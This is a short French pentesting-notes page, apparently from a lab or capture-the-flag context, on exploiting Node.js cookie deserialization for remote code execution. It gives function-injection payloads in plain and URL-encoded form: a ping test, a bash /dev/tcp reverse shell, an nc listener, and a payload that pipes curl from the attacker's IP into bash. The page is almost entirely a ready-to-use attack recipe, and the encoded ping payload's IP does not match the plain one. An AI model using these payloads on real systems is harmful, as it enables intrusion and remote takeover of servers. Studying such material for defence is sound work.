Node.js Deserialization RCE - Pentesting Web

Exploitation de la désérialisation NodeJS

Découverte d'une fonction qui désérialise les cookies de session.

Création d'un Payload:

{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ping -c 1 10.10.14.61', function(error, stdout, stderr) { console.log(stdout) }); }()"}

Écoute du trafic ICMP avec :

tcpdump -i tun0 icmp -n

Url Encode:

%7b%22%72%63%65%22%3a%22%5f%24%24%4e%44%5f%46%55%4e%43%24%24%5f%66%75%6e%63%74%69%6f%6e%28%29%7b%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%28%27%70%69%6e%67%20%2d%63%20%31%20%31%30%2e%31%30%2e%31%34%2e%32%38%27%2c%20%66%75%6e%63%74%69%6f%6e%28%65%72%72%6f%72%2c%20%73%74%64%6f%75%74%2c%20%73%74%64%65%72%72%29%20%7b%20%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%73%74%64%6f%75%74%29%20%7d%29%3b%20%7d%28%29%22%7d

Construction d'une RCE via URL Encoding et injection dans les cookies.

tcpdump -i tun0 icmp -n

RCE - Vulnérabilité Deserialization (nodejs)

Création d'un script de reverse shell index.html :

#!/bin/bash 
bash -i >& /dev/tcp/10.10.14.61/443 0>&1

Démarrage d'un serveur HTTP :

python3 -m http.server 80

Mise en écoute :

nc -nlvp 443

Envoi de la charge utile :

{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('curl http://10.10.14.61 | bash', function(error, stdout, stderr) { console.log(stdout) }); }()"}

Url Encode:

%7b%22%72%63%65%22%3a%22%5f%24%24%4e%44%5f%46%55%4e%43%24%24%5f%66%75%6e%63%74%69%6f%6e%28%29%7b%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%28%27%63%75%72%6c%20%68%74%74%70%3a%2f%2f%31%30%2e%31%30%2e%31%34%2e%36%31%20%7c%20%62%61%73%68%27%2c%20%66%75%6e%63%74%69%6f%6e%28%65%72%72%6f%72%2c%20%73%74%64%6f%75%74%2c%20%73%74%64%65%72%72%29%20%7b%20%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%73%74%64%6f%75%74%29%20%7d%29%3b%20%7d%28%29%22%7d

Résultat : Accès shell obtenu.

Mis à jour il y a 9 mois

Ce contenu vous a-t-il été utile ?